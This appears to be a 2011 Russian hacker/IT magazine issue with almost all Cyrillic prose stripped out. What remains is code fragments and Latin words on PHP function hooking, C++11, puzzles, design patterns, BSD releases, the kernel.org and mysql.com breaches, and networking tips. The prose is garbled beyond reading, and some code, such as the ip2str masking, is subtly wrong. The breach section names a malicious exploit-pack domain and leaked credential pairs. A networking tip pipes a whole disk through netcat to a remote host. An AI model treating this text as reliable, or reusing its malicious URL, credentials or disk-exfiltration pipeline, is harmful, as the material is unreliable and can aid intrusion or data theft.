MSVCR90.dll,
( , PE Tools
). ,
.
, MT.EXE ( , )
.
100
. .

- ,
, - . CMS
, ,

URL. , , CMS
.
get_included_files,
, , . ,
, . ,
fopen, file_get_contents, file readfile. , !
MySQL- .
. , , ( php.ini).

( : get_readed_files)
(, $_READED_FILES). php.ini (
, ini_set .htaccess
).
? PHP , . :
void zif_FUNCNAME(int ht, zval *return_value,
zval **return_value_ptr, zval *this_ptr,
int return_value_used TSRMLS_DC)
:
PHP_FUNCTION(FUNCNAME)
, , ,
, ,
( ). ,
, .
12 /155/ 2011
PHP
data->internal_function.handler = hacked_file;
}
.
( , ). , .
callback:
zval* argv[1];
zval* func;
zval* retval = NULL;
MAKE_STD_ZVAL(retval);
argv[0] = XH_G(_my_readed_files);
MAKE_STD_ZVAL(func);
ZVAL_STRING(func,"var_dump",0);
call_user_function(EG(function_table),
NULL, func, retval, 1, argv TSRMLS_CC);
Sara Golemon
, ZTS ? , .
, PHP
, , ,

. ,
- , ,
.
executor_globals,
EG. PHP- (HashTable*).
zend_function_entry,

.

, PHP
var_dump(). ,
callback. call_user_function,
. :
function_table, ( NULL),
, , ,
.
. MINIT :
zend_register_auto_global("_READED_FILES",
sizeof("_READED_FILES")-1,NULL TSRMLS_CC);
, _READED_FILES
($_READED_FILES). RINIT :
ZEND_SET_GLOBAL_VAR("_READED_FILES",
XH_G(_my_readed_files));
arr_hash = EG(function_table);
for(zend_hash_internal_pointer_reset_ex(
arr_hash, &pointer);
zend_hash_get_current_data_ex(arr_hash,
(void**) &data, &pointer) == SUCCESS;
zend_hash_move_forward_ex(arr_hash, &pointer))
{
if(!strcmp("file",
data->internal_function.function_name))
{
original_file = data->internal_function.handler;

EXECUTOR_GLOBALS
12 /155/ 2011
,
.
.
, , unset($GLOBALS['_
READED_FILES']),
.

,
EG (symbol_table). ,
( , ),
,
get_readed_files().
, TSRM.

PHP. .
, . , PHP-.
, SAPI
. . z
101
(bumshmyak@yandex.ru)

C++11:
C++

++
,

.

.
102
WWW
-
: bit.ly/
oVEtjX.

: bit.ly/
gRbESx.
FAQ ++11
:
bit.ly/1gNDCk.
++11
Danny Kalev: bit.ly/
mOTT91.
INFO

++0x,

2010
. ++

x
INTRO
2011 ISO C++ (ISO/IEC
14882:2011). C++11.
2003 .
,
. 2007
TR1,
, ,
.
ISO :
C++ ,
, ; C++
.
. -,
, . , rvalue references (move
semantics) constexpr. , . (threads), (regex),
(tuples), . ,
, ( 1320 ).
.
?

(https://wiki.apache.org/stdcxx/C%2B%2B0xCompilerSupport).
12 /155/ 2011
, , .
GCC,
GCC 4.6.1 .
C++11, -std=c++0x.
, .

,
.
auto,
, . :
auto
auto
auto
auto
x = 42; // int
pi = 3.14; // double
c = 'x'; // char
str = string("xxx"); // string
CHECKPOINT
, :
#include <type_traits>
auto x = 42;
static_assert(std::is_same<decltype(x), int>::value,
"42 is not int");
static_assert(!std::is_same<decltype(x), unsigned int>::value,
"42 is unsigned int");
std::is_
same<FirstType, SecondType>::value,
. type_traits,
. type_traits
.
, type_traits
, , ,
:
, C++11, , ,
. auto . , . ,
template
template
template
template
vector<string>::iterator start = hosts.begin();
<class
<class
<class
<class
T>
T>
T>
T>
struct
struct
struct
struct
POD-
.
auto start = hosts.begin();
int a[] = {1, 2, 3};
auto ,
- . :
struct Person {
const char* name;
int age;
};
template <class FirstType, SecondType>

void ShowMadSkills(FirstType first, SecondType second) {
auto third = first + second;
// ...
}

first second, third.
DECLTYPE STATIC_ASSERT
, , . decltype(expression)
. :
auto x = 2; // int
auto y = 2.0 // double
decltype(x + y) z; // double

static_assert. :
static_assert(expression, error_string)
static_assert , expression
.
- . expression
, error_string.
static_assert:
static_assert(sizeof(int) >= 4, "too small int");
12 /155/ 2011
is_pointer;
is_const;
add_const;
remove_reference;
struct Person person = {"John Doe", 42};
, - STL, push_back insert. ++11

(initializer lists). , :
vector<int> a = {1, 2, 3};
map<string, int> persons =
{{"John Doe", 42},
{"Bugs Bunny", 71}};
?
(std::initializer_list), , ,
. {...} ,
, .
std::initializer_list ,
, .
, , .
,
:
#include <initializer_list>
class SequenceClass {
public:
SequenceClass(std::initializer_list<int> list) :
103

data_(list.begin(), list.end())
{ }
int size() {
return data_.size();
}
private:
vector<int> data_;
};
cout << x << endl;

}
x seq, .
++11 , -.
-

. ++03
:
string a = "first";
string b("second");
int c[] = {1, 2, 3};
struct D {
int m_;
D(int m) : m_(m) {}
};
, C++11,
, .
.
:
string a = {"first"};
string b{"second"};
int c[] = {1, 2, 3};
struct D {
int m_;
D(int m) : m_{m} {}
};
D d{0};
, ,
std::initializer_list,
, . :
vector<int> a(4); // 4
vector<int> b{4}; // 4
, .
:
class D {
int m_ = 42;
};
(const static) .
, , .
FOR

- .
for,
.
:
vector<int> seq = {1, 2, 3, 4, 5};
for (auto x : seq) {
104
- (-, ) , .
, . .
- :
[capture list](parameters) -> return type {
body
}
-, parameters, , body,
return type. (capture list)
, ()
. ,
.
,
left right.
vector<int> a = {1, 2, 3, 4, 5};
int left = 2;
int right = 4;
int count = 0;
for_each(a.begin(), a.end(), [left, right, &count](int x) {
if (x >= left && x <= right) {
++count;
}
});
cout << count << endl;
? for_each
( ), .
-. .
, .
,
, &, . ,
.
void. , return
.
, -
, - , .
- , :
class F {
public:
F(int left, int right, int& count) :
left_(left),
right_(right),
count_(count)
{ }
void operator()(int x) const {
if (x >= left_ && x <= right_) {
++count_;
12 /155/ 2011
std::function<int (int)>& unary_operation) {

vector<int> res;
std::transform(input.begin(), input.end(),
back_inserter(res),
unary_operation);
return res;
Feature
GCC
Intel C++
MSVC
auto
4.4 (v1.0)
11.0(v0.9)
10.0 (v0.9)
decltype
4.3 (v1.0)
11.0(v1.0)
10.0 (v1.0)
static_assert
4.3
11.0
10.0
Builtin type_traits
4.3
10.0
8.0
Initializer lists
4.4
Non-static data member

initializers
4.7
Range-based for-loop
4.6
Lambda
4.5 (v0.9)
11.0 (v0.9)
12.0 (v1.0)
10.0 (v1.0)
11.0 (v1.1)
mymap, .
R-value references
4.3 (v1.0)
11.1 (v1.0)
12.0 (v2.0)
10.0 (v2.0)
11.0 (v2.1)
vector<int> seq = {1, 2, 3, 4, 5};

vector<int> neg = mymap(seq, [](int x) { return -x; });
}
}
private:
int left_;
int right_;
int& count_;
};
for_each c -
:
for_each(a.begin(), a.end(), F(left, right, count));
:
[] ;
[=] , ;
[&] , , ;
[this] , .
.
1 N.
vector<int> a;
int last = 0;
std::generate_n(back_inserter(a), N, [last]() mutable {
return ++last;
});
,
mutable. , -,
:
std::function<signature>, ,
,
. ,
mymap,
, .
, mymap , neg,
.
( ) .

neg , ,
, . ,
. ,
. ,

,
, .
C++11 .
rvalue references:
. .

.
class MovableType {
MovableType(MovableType&& rhs);
MovableType& operator=(MovableType&& rhs);
};
, rvalue references
&&.
MovableType ,
. ,
,
.
++11 ,
.
OUTRO
ReturnType operator()(...) const { ... };
, mutable.
map:
vector<int> mymap(const vector<int>& input,
12 /155/ 2011

C++11, ,
. , ++
, , , .
, . , C++11 . z
105
(ivinside.blogspot.com)

!
,
, ,
.
106
12 /155/ 2011
1
1 100000.
. , .
.
inotify Linux,
. ,
.

. , ,
, . 1,
100000, 1.
: (a1 + an) * N/2, a1 ,
an , N . ,

, .
. , :
, , .
,
.
:
random2()
2 * random2()
, . , random4() ,
, . ,
random4() random3(), :
from os import listdir

from random import randrange
from time import sleep
#
sum1 = sum(int(filename) for filename in listdir('./q1'))
# , 10 -
sleep(10)
#
sum2 = sum(int(filename) for filename in listdir('./q1'))
# ,
deleted = sum1
sum2
#
if deleted: print ' %s' % deleted
else: print ' '
#
def random2():
""" 0 1 """
return randrange(0, 2)
#
def random4():
""" 0, 1, 2 3 """
return random2() + 2 * random2()
#
def random3():
""" 0, 1 2 """
result = random4()
# ,
# , ,
#
if result == 3:
return random3()
return result
2
random2(), 0
1. random3(), 0, 1 2.
,
() ,
.
3
1: random4().
2: .
random4()?
, , random2(). :
, . .
. .
, , ?
: .
random2()
random2()
12 /155/ 2011
, . ! , ,
, ,
, . , .
.
: , , . , .
107

1
.
,
?
2
:
tokens = []
for token in tokeniter:
if token not in tokens:
tokens.append(token)
: ,
.
. - (youtu.be/
DTWZqh64RcQ). , ,
.
1. ,
chmod() .
Python :
# python2 -c "import os; os.chmod('/bin/chmod', 0755)"
Perl:
# perl -e 'chmod 0755, "chmod"'
tokensiter ,
, .

,

tokensiter.

.
3

Linux?
4
# nmap -sS -Pn -n -iL active-hosts
.
,
/ filtered.
?
, .
, ,
, . ,
,
.
, :
= 1
, :
__()
_()
__(-)
:
+= 1
' ', , ''
, ? ,
.
.
4
/bin chmod -x chmod. .
108
, , :
#include <sys/types.h>
#include <sys/stat.h>
int main()
{
chmod("/bin/chmod", 0000755);
}
2. GCC .
:
$ cat - > chmod.c
int main () { }
^D
$ cc chmod.c
$ cat /bin/chmod > a.out
$ mv a.out new_chmod
$ cat /bin/chmod > new_chmod
# new_chmod +x /bin/chmod
: . a.out, .
cat /bin/chmod
.
GCC,
. ,
/bin/chmod , .
:
# cp /bin/ls /bin/ls_prev && cat /bin/chmod > /bin/ls &&
> /bin/ls +x /bin/chmod && mv /bin/ls_prev /bin/ls
3. tar, :
$ tar --mode 0755 -cf chmod.tar /bin/chmod
$ tar xvf chmod.tar
, --mode,
. .
4. Cpio , ,
, 21-. ,
:
12 /155/ 2011
$ echo
cpio
perl
cpio
chmod |
-o |
-pe 's/^(.{21}).../${1}755/' |
-i -u
5. , ,
, /bin/chmod, . Debian- :
# apt-get install --reinstall coreutils

init) :
# init 6
, :
0 ;
1 , ;
2 ;
3 , ;
4 , ;
5 + ;
6 .
5
,
blob.dat.
, ,
:
def bstr(n):
""" ."""
return ''.join(
[str(n >> x & 1) for x in (7,6,5,4,3,2,1,0)])
#
f = file('blob.dat', 'rb')
#
bytes = f.read()
#
#
sheet = ''.join([bstr(ord(c)) for c in bytes])
# '1'
print sheet.count('1')
, .
:
,

. , popcnt.
Core i7 sse4.2.
: http://gurmeet.net/puzzles/fast-bit-counting-routines/.
init , , /etc/inittab.
3. Magic SysRq (
CONFIG_MAGIC_SYSRQ):
# echo 1 > /proc/sys/kernel/sysrq
# echo b > /proc/sysrq-trigger
4. : Alt + SysRq,
23 R E I S U B.
:
unRaw ( ),
tErminate ( SIGTERM ),
kIll ( SIGKILL , ),
Sync ( ),
Unmount ( ),
reBoot ( ).
,
CONFIG_MAGIC_SYSRQ (
).
7
IP-.
,
IP-,
, IP-.
Linux- .
def ip2str(ip):
""", IP-."""
1.
shutdown:
# shutdown -r now
, halt reboot,
,
shutdown. , halt shutdown -h now, reboot
, shutdown -r now.
2. , init ( telinit,
12 /155/ 2011
#
#
#
if
IPv4,
,
4
ip > 0xffffffff:
raise ValueError('number must be 32 bit')
ipstr = '{0}.{1}.{2}.{3}'.format(ip >> 24,
ip & 0x00ffffff >> 16,
ip & 0x0000ffff >> 8,
ip & 0x000000ff)
return ipstr

. z
109
000, 00spersky Lab

deeonis (deeonis@gmail.com)
,
- .
-. ?
, .
,
-,
. .
,
- .
, ,
, , ,
.
, - XXI ,
.

Hello world! ,
, ,
, . .
,
, ,
.
,
,
.
110

,
SMSBilling, .
float cost(), .
,
cost() , . , :
SMSBeeline, SMSMegafon SMSMts.

class SMSBilling
{
public:
virtual float cost() = 0;
...
}
class SMSBeeline: public SMSBilling
{
public:
virtual float cost()
{
...
return beelineCost;
};
...
}
// SMSMegafon SMSMts SMSBeeline
12 /155/ 2011
. - , , SMSBilling.
, , , .
, ,
.
, . ,
()
,
. ,
-.

class SMSBeelineUA: public SMSBilling
{
public:
{
...
return beelineUACost;
};
...
}
class SMSBeelineBY: public SMSBilling
{
public:
{
...
return beelineBYCost;
};
...
}
// SMSMegafonUA, SMSMegafonUA, SMSMtsUA SMSMtsBY
// SMSBeelineUA SMSBeelineBY
,
, .
, SMSBilling,
. , SMSBeeline, SMSMegafon
SMSMts, SMSBeelineUA, SMSMtsBY . .
cost(), ,
.
,
. , ,
.
, - .
, -
?
cost() .
, ,
.
, , , :

class SMSBeelineUA: public SMSBeeline
{
public:
12 /155/ 2011
{
...
//
//
beelineUACost = __super::cost() * coefficientUA;
};
...
}
// SMSMegafonUA, SMSMegafonUA, SMSMtsUA, SMSMtsBY
// SMSBeelineBY SMSBeelineUA
? ,
. SMSBeeline,
SMSMegafon SMSMts cost()
,
SMSMtsBY, SMSMegafonUA . .
. , ( RU),
cost(). ,
.

- ,
. .
,
5 %. , , . . ,
. , ,
7 %,
5 %- ,
12 %.
,
. .
, .

class SMSBeelineUABirthdayDiscount: public SMSBeelineUA
{
public:
{
...
//
//
//
beelineUABirthdayCost =
__super::cost() * coefficientBirthday;
111
return beelineUABirthdayCost;
};
...
}
//
// SMSBeelineUABirthdayDiscount
,
SMSBilling setDiscount(float),
,
.

class SMSBilling
{
private:
float m_discount;
public:
void setDiscount(float discount) {m_discount = discount;};
...
}
{
public:
{
...
return beelineCost;
};
...
}
// SMSMegafon SMSMts SMSBeeline
class SMSBeelineUA: public SMSBeeline
{
public:
{
...
//
112
//
//
//
if
,
,

(m_discount != 0)
beelineUACost =
__super::cost() * coefficientUA * m_discount;
else
beelineUACost = __super::cost() * coefficientUA;
};
...
}
// SMSMegafonUA, SMSMegafonUA, SMSMtsUA, SMSMtsBY
// SMSBeelineBY SMSBeelineUA
billing = new SMSBeelineUA();
// ,
billing->setDiscount(0.1);
cost = billing->cost();
,
, ,
, ,
.
, .

. , ,
-. . ,
. , , SMSBilling
SMSBeeline, SMSMegafon SMSMts.
,
-. .
RegionDecorator,
SMSBilling.
,
SMSBilling.
. cost() RegionDecorator SMSBilling,
.
, . ,
.
12 /155/ 2011

class SMSBilling
{
public:
...
}
{
public:
{
...
return beelineCost;
};
...
}
class RegionDecorator: public SMSBilling
{
private:
SMSBilling &m_billing;
public:
RegionDecorator(SMSBilling &billing) :
m_billing(billing)
{
}
...
}
class RURegionDecorator: public RegionDecorator
{
public:
RURegionDecorator(SMSBilling &billing) :
RegionDecorator(billing)
{}
{
float costRU = m_billing.cost() * coefficientRU;
return costRU;
}
...
}
// UARegionDecorator
// RURegionDecorator

, RURegionDecorator,
UARegionDecorator . .
.
SMSBilling.
:

//
SMSBilling &billing = new SMSBeeline();
// ""
billing = new RURegionDecoator(billing);
//
float cost = billing.cost();
.
.
cost()
.
DiscountDecorator.
12 /155/ 2011
DiscountDecorator
class DiscountDecorator: public SMSBilling
{
private:
SMSBilling &m_billing;
public:
DiscountDecorator(SMSBilling &billing) :
m_billing(billing)
{
}
...
}
class BirthdayDiscountDecorator: public DiscountDecorator
{
public:
BirthdayDiscountDecorator(SMSBilling &billing) :
DiscountDecorator(billing)
{
}
{
float costBirthday =
m_billing.cost() * coefficientBirthday;
return costBirthday;
}
...
}
// ""
// BirthdayDiscountDecorator
//
SMSBilling &billing = new SMSBeeline();
// ""
billing = new RURegionDecoator(billing);
//
billing = new BirthdayDiscountDecoator(billing);
//
//
float cost = billing.cost();

,
.
.
,
. ,
.
, -, (
setDiscount), -,
, ,
, .

. , :
, (
)
.
.

. z
113
(grinder@tux.in.ua),
(execbit.ru)
UNIXOID
INFO
OpenBSD
: 1
1 . 5.0
32 .

OPENBSD 5.0
FREEBSD 9.0

OpenBSD 2.3 2.4

,
Beastie,
Puffy
.
,

,
,

.
.
,

. OpenBSD FreeBSD

. ,

.
OpenBSD

BSD-
FreeBSD.
NetBSD DragonFlyBSD.
114

OpenBSD 19
(1995 ).

16 .
OpenBSD

LiveCD: MarBSD, Quetzal,
FuguIta, jggimi, OliveBSD,
AnonymOS, LiveCDOpenBSD, BSDanywhere
.
WWW
OpenBSD
openbsd.org.

OpenBSD openbsd.ru,
obsd.ru.

OpenBSD Journal
undeadly.org.
-
OpenBSD openports.se.
OPENBSD 5.0
OpenBSD 1995 , ,
NetBSD, -
.
, . Free, Functional and Secure
. , , , .
, , - ,
.
. (dhcpd, ntpd, bgpd) ,
.
API ( strlcat,
strlcpy, issetugid, arc4random ) (, Systrace, GCC/ProPolice), ,
OpenBSD .
OpenBSD ,
, Linux BSD-, (blob, binary linked
12 /155/ 2011
OpenBSD
OpenBSD 4.9 /etc/rc.d
object ),
. , ,
.
OpenBSD, gNewSense Gobuntu .
,
, BSD. ,
, Adaptec. ,
FSF , OpenBSD, .
( ,
, , ).
Makefile URL , . ,
.
OpenBSD 17
,
. BSD- ISC,
,
. BSD GPL,

. OpenBSD . , (sshd, ntpd, X ).
( Linux, , ), 16

. (Only two remote holes in the default install,
in a heck of a long time!) , (, openbsd.ru)
.

.
. 5.0.
: ,
, .
.
azalia(4), vr(4), bnx(4), em(4), ix(4), mpi(4)

.
Wake on LAN
(re, vr, xl).
pf IPv6 ACK,
MTU, (IPv4 MPLS).
ospfd Opaque LSA (Link-State
Advertisement), RFC2370/RFC5250
(911). ,
( ), .
graceful restart ( non-stop forwarding, RFC3623)
9, , MPLS (,
)
10. OpenBSD
MPLS-.
XORP XORQ SoftRAID RAID6,
.
,
i386.
USB-.
compat_freebsd, compat_linux .
, GNU Debugger.
tmux,
. -s , tmux-.
CWM
60 , Xinerama,
, . libdrm_radeon,
3D ATI.
sysctl kern.pool_debug,
POOL_DEBUG (
).
.
, . . , AMD64 bigmem .

malloc
.
,
. .
.
12 /155/ 2011
115
UNIXOID
(hexdump, tcpdump, libc) , UTF-8.
OpenBSD 4.9
/etc/rc.d. 5.0
,
/etc/rc.d rc- rc.{local,shutdown}.
netstat -vP, PCB- (Protocol
Control Block), .
disklabel '-F', UID,
fdisk mount ( ).
pkg scp://hostname/~user/subdir.
Beagle board (
OMAP3530 ARM
Cortex-A8, Texas Instruments DigiKey).
OPENSSH 5.9
OpenBSD , , .
PF, IPFilter
BSD, NTP
OpenNTPD, OpenOSPFD OpenBGPD. ,
CVS OpenCVS.
OpenSSH SSH,
.
OpenSSH 5.9, 6 ,

sandboxes ()
systrace, seatbelt rlimit.
( )
. sandbox ,
.
UsePrivilegeSeparation sandbox, .
,
,
SSH-, ,
.
. systrace

OPENBSD/IPSEC?
2010 OpenBSD
IPsec.
,
, . , ,
. : goo.gl/Rl964.
. systrace,
SYSTR_POLICY_KILL
( OpenBSD). seatbelt, OS X/Darwin, ,
. rlimit
, .
setrlimit()
. sandbox
UseLogin .
ssh_config Host,
, .
* ( ) ? ( ), 5.9 !. ,
, , :
# cat /etc/ssh/ssh_config
Host *.example.org !host1.example.org
SONG 5.0
OpenBSD .

, .
5.0 What Me Worry? (goo.gl/dRisZ).
PC-BSD 9
FreeBSD 9.0
- PC-BSD 9.
ZFS
GELI-,
(KDE 4, GNOME 2, XFCE 4, LXDE) .
,
Life-Preserver .
PBI- ,

,
.
, freebsd-update

(, 9.0 9.1).
OpenBSD LiveCD
116
12 /155/ 2011

SHA256: HMAC-SHA2-256, HMAC-SHA2-256-96, HMAC-SHA2-512
HMAC-SHA2-512-96. ssh-keysign
ECDSA.
AuthorizedKeysFile (sshd_config) ,
. (%h
, %u . .), .
: AuthorizedKeysFile
, (
).
UserKnownHostsFile/GlobalKnownHostsFile
.
5.7 IPQoS TOS/DSCP/QoS,
. IPQoS IPv6.
ssh-keygen '-A', (RSA, DSA ECDSA)
( ).
. , , ssh-add < /path/to/key,
ssh-add
.
FREEBSD 9.0
C FreeBSD
9.0. , .
FreeBSD Linux , ,
.
FreeBSD 9 DTrace,
Solaris.
7.0,
DTrace
.
/ .
/ ,
UNIX.

LLVM Clang, GCC , .
GCC,
GPLv3, LLVM/Clang BSD,
FreeBSD -
FreeBSD 9.0
12 /155/ 2011
OpenBSD
. ,

GCC LLVM/Clang.
,
, Jail-,
RCTL,
,
, setrlimit(). rctl
,
, SIGHUP
syslog (
, ).

Capsicum,
, . Capsicum
,
SELinux AppArmor, .
,
cap_new() cap_enter()
, (
),
/
.
, , ,
( tcpdump , chromium ).
TCP-,
117
UNIXOID
FreeBSD 9.0
BSD-
*nix-:
SMP- ( 32 CPU),
TCP- CPU,
(HTCP, CUBIC, Vegas, HD CHD),
(Congestion Control) TCP.
TCP- ERTT
(Enhanced Round Trip Time),
Congestion Control.
sysinstall,
,
BSDinstall, . , ,
GPT-, ZFS Jail. , BSDInstall
(,
, ) .
, BSDinstall .
USB-, USB 3.0, XHCI (eXtensible Host Controller Interface).
, USB 1.0/2.0,
OHCI, UHCI EHCI.
Soft Updates UFS . ,
, fsck. UFS
TRIM,
SSD- .
GEOM, , ,
4K, .
118
gpart
,
UFS
4/32 .
GEOM , -
,
.
gsched_rr,
.
AES GEOM- GELI XTS,
.
RAID-
ataraid graid, ATA. , , GEOM
. RAID
. Intel,
JMicron, NVIDIA, Promise SiliconImage.
RAID-: RAID0, RAID1, RAID1E, RAID10, SINGLE, CONCAT.
GEOM- HAST,
ggate ,

master .
ZFS 28, , :
(),

.
RAIDZ3, , ,
.
ZFS zfs diff.
NFS- .
UFS NFSv4 ACL POSIX ACL. z
12 /155/ 2011
>>>> coding
coding
UNIXOID
(execbit.ru)

KERNEL.ORG,
LINUX.COM,
LINUXFOUNDATION.ORG
MYSQL.COM

kernel.org
Linux.
linux.com
linuxfoundation.org,
mysql.com.
,
?
.
INFO
,
mysql.com,

: ClamAV,
Rising, TrendMicro
TrendMicro-HouseCall.
120
Gitolite,

kernel.org,

,

$1000 ,
.
KERNEL.ORG,

kernel.org , ,
. John Warthog9 Hawley, kernel.org, users@kernel.org
(pastebin.com/BKcmMd47)
. ,
HPA (H Peter Anvin), hera,
odin1, , , demeter2, zeus1 zeus2.
.
:
1. 12 .
2. , .
3. Xnest
/dev/mem, ,
.
, , ,
. . . . , kernel.org
,
Linux, ,
Git, Warthog9,
, Google+, kernel.org, ,
3Leaf Systems, C2 Microsystems, Orion Multisystems,
web- Iowa Interactive .
12 /155/ 2011
, , ,
!
- Warthog9 ,

Phalanx SSH-,
Warthog9 - . , Phalanx,
, , 2008 SSH-,
.
cd /etc/khubd.p2/ rkhunter, ,
, kernel.org.
, , , . ,
, SSH-
kernel.org, ,
root - , Phalanx, .
, , .
kernel.org. ,
.
, . Corbet Linux Foundation (goo.gl/7MyRu),
.
Git ,

. , Git
,
.
, ,
, , .
, , , ,
, .
, .
,
kernel.org . Linux
github.com, , , (https://github.com/
torvalds/linux). , .
kernel.org
, SSH-. SSH Git,
HTTP.
,
Gitolite,

.
: goo.gl/1brFK.

kernel.org ( ).
: LINUX.COM
LINUXFOUNDATION.ORG

kernel.org linux.com
linuxfoundation.org.
, . , , , ,
, kernel.org.
SSH-,
. ,
12 /155/ 2011
kernel.org
Linux Foundation
.
linux.com linuxfoundation.org,
Open Printing, Linux Mark Foundation events
. 6
.

. , ,
Linux Foundation , , .
? , , , ,
, ,
kernel.org, , Linux Foundation . ,
, ,
SSH
. ,
kernel.org ,
SSH- - Linux Foundation,

Linux .
linux.com
(goo.gl/N1DZX) .
,
, .
Guru-2012 linux.com
.
MYSQL.COM,
Armorize (goo.gl/PGKRi),
web-,
mysql.com. HackAlert,

, MySQL. .
, JS-, ,
, IFrame. , ,
truruhfhqnviaosdpruejeslsuy.cx.cc/main.php,
BlackHole exploit pack. - Adobe Flash, Adobe PDF Java
MW:JS:159, FTP- ( PHP-, HTML- JS-).
121
UNIXOID

KERNEL-
kernel.org Greg Kroah-Hartman
kernel.org
.
,
,
chkrootkit ,
,
,
, .
: goo.gl/VYyCl.
JS-, mysql.com
JS-, mysql.com ( )
, linux.com
122
, , .
( 22 ).
mysql.com Oracle ,
, .
, mysql.com.
, Trend Micro .
mysql.com,
,
sourcecOde.
3000 root-
, MySQL. ,
, JS- .
. , sourcecOde,
.
, uname -a whoami Fedora Core 11
http1.web.mysql.com. ,

root, nmap dig. ,
, root-,
. ,
www
.
.
mysql.com . SQL- .
. ,
,
, sys:phorum5,
sysadm:qa. admin:6661 (,
!), ,
,
,
web-.
, mysql.com

.
12 /155/ 2011
WINEHQ.ORG
FEDORAPROJECT.ORG
root- mysql.com

opensource-. Wine,
appdb.winehq.org. Jeremy White,
.
,
. , , Jeremy White,
. ,
web- phpMyAdmin
. phpMyAdmin
. ,
,
.
,
phpMyAdmin ,
, SSH- OpenVPN.
Fedora
SSH- , ,
,
kernel.org, linuxfoundation.org linux.com.
30 ,
.
: , ,
, 12
, 20 .

.

. ?
, ,
kernel.org, . GNU:
savannah.gnu.org. SQL- ,
. , PHP-.
48 ,
,
.
.
2010 Apache Software
Foundation, , , .
.
apache.org 2009 ,
apachecon.org, 0day-, SSH- backup-
people.apache.org .
, mysql.com
12 /155/ 2011
- , ,
. kernel.org , Linux Foundation -
SSH- , kernel.org,
mysql.com .
,
. z
123
SYN/ACK
hatchet (maks.hatchet@yandex.ru)
,

UNIX-
.

-, .
.
, .
124
,
,
, Bluetooth, -
,
RAID-. ,
, .
,
.
PPTP/PPPoE-, , /
, , -
DHCP-.
, network-manager DHCP-,
.
.
.
quickswitch, -
12 /155/ 2011
, , , ifup
Debian/Ubuntu, . ,
: http://muthanna.com/quickswitch.
Perl,
switchto /usr/local/bin.
quickswitch
,
/etc/quickswitch/switchto.conf :
# vi /etc/quickswitch/switchto.conf
[config]
//
device=eth0
//
servicefilename=/etc/quickswitch/switchto.last
// home
[home]
description=home
address=192.168.0.25
netmask=255.255.255.0
gateway=192.168.0.1
dns1=195.62.99.42
dns2=195.62.97.177
// work
[work]
description=work
address=10.16.3.114
netmask=255.255.255.0
gateway=10.16.3.249
dns1=195.62.99.42

switchto:
$ sudo switchto work
$ sudo switchto home
,
,
wpa_supplicant. :
12 /155/ 2011
$ su -s
# mv /etc/wpa_supplicant.conf /etc/wpa_supplicant.conf.bak
# wpa_passphrase ssid/- >> \
/etc/wpa_supplicant/wpa_supplicant.conf
:
$ sudo ifconfig wlan0 up
$ sudo iwconfig wlan0 essid $net
$ sudo wpa_supplicant -B -Dwext -i wlan0 \
-c /etc/wpa_supplicant.conf
$ dhcpcd wlan0
, . , , :
# vi /usr/local/bin/tryconnect.sh
#!/bin/sh
# ( /etc/quickswitch/switchto.conf)
NETS="home work"
# ( SSID)
WNETS="home work"
#
# DNS-.
#
tryping() {
if ping -q -n -c 1 8.8.8.8; then exit; fi
}
# ,
tryping
# , $NETS
for net in NETS; do
switchto $net; sleep 10
tryping
125
SYN/ACK

FTP DD

OPENBSD
,

speedtest.net. ftp-:
OpenBSD
:
ftp> put "|dd if=/dev/zero bs=1M count=100" /dev/null

ftp-
100
.
//
# ifconfig em0 up
//
# ifconfig ath0 nwid my_wlan up
//
# ifconfig trunk0 trunkproto failover \
trunkport em0 trunkport ath0 \
192.168.1.1 netmask 255.255.255.0
Wi-Fi.
done
# , DHCP
dhcpcd eth0
sleep 5
tryping
# , Wi-Fi
killall dhcpcd
ifconfig wlan0 up
# Wi-Fi-
for net in WNETS; do
iwconfig wlan0 essid $net
wpa_supplicant -B -Dwext -i wlan0 \
-c /etc/wpa_supplicant.conf
sleep 10
dhcpcd wlan0
sleep 5
tryping
done

netcat, ,
(
-2 -1):
-1# netcat -l -p 9000 | dd of=/dev/sda
-2# dd if=/dev/sda | netcat IP--1 9000
, ,
100 %, .
crontab,
, , ,
:
$ sudo crontab -e
*/5 * * * * /usr/local/bin/tryconnect.sh
. network-manager
.
PPPoE/PPTP-
3G- wvdial.
BLUETOOTH-

Wi-Fi, . ? ,
, Wi-Fi-
.
Bluetooth, ,
( USB-Bluetooth-)
.
Bluetooth
IP-, Linux,
BSD-. PAN (Personal
Area Networking), BNEP (Bluetooth Network
Encapsulation Protocol).
126
quickswitch
12 /155/ 2011
Linux :
1. ,
, pand, :
$ sudo pand -listen -role NAP
2. bnep0, pand:
$ sudo ifconfig bnep0 192.168.0.1
3. - pand bnep0 (MAC-

hcitool scan Bluetooth):
$ sudo pand -connect MAC--
$ sudo ifconfig bnep0 102.168.0.2
$ sudo route add default 192.168.0.1
, ,
, NAT:
$ sudo sysctl -w net.ipv4.ip_forward=1
$ sudo iptables -t nat -A POSTROUTING \
-o eth0 -j MASQUERADE
FreeBSD:
1. sdpd,
Bluetooth- ,
Bluetooth-:
# kldload ng_ubt
# /etc/rc.d/sdpd start
2. - btpand :
# ifconfig tap0 create
# btpand -i tap0 -s NAP
# ifconfig tap0 192.168.0.1 netmask 255.255.255.0
3. - :
#
#
#
#
ifconfig tap0 create

btpand -d ubt0 -i tap0 -s NAP -a MAC--
ifconfig tap0 192.168.0.2 netmask 255.255.255.0
route add default 192.168.0.1
4. ,
NAT:
# sysctl net.inet.ip.forwarding=1
# ipfw add nat 123 all from tun0 to any
MAC-
:
deluge,
-.
:
# vi /usr/local/bin/autotorrent.sh
#!/bin/bash
# ( ),
#
IDLE=120000
#
STOPCMD="transmission-remote -S"
#
STARTCMD="transmission-remote -s"
# STOPCMD="deluge-console pause \*"
# STARTCMD="deluge-console resume \*"
STOPPED="yes"
while true; do
if [ 'xprintidle' -gt $IDLE ]; then
if [ $STOPPED = "yes" ]; then
$STARTCMD
STOPPED="no"
fi
else
if [ $STOPPED = "no" ]; then
$STOPCMD
STOPPED="yes"
fi
fi
sleep 60
done
STOPCMD STARTCMD
.
-. , deluge ,
deluged.
~/.config/autostart:
# ln -s /usr/bin/deluged ~/.config/autostart
# hccontrol -n ubt0hci inquiry
:
trickle, , -
12 /155/ 2011
ALSA
arecord,
. ,
127
SYN/ACK
, , . ,
netcat,
. , VoIP-
:
-1$ netcat -l -p 5555 | aplay
-2$ arecord | netcat IP--1 5555
-2 -1. .
, .
,
,
.
, ALSA , :
$ vi .asoundrc
pcm.copy {
type plug
slave {
pcm hw
}
route_policy copy
}
arecord netcat:
-2 $ arecord -D copy | netcat IP--1 5555
RAID1
RAID. ,
.
, RAID- , RAID-
.
, , .
Linux/BSD-, , , ,
.
, ,
.
RAID-
, , RAID (, ,
IDE ),
(

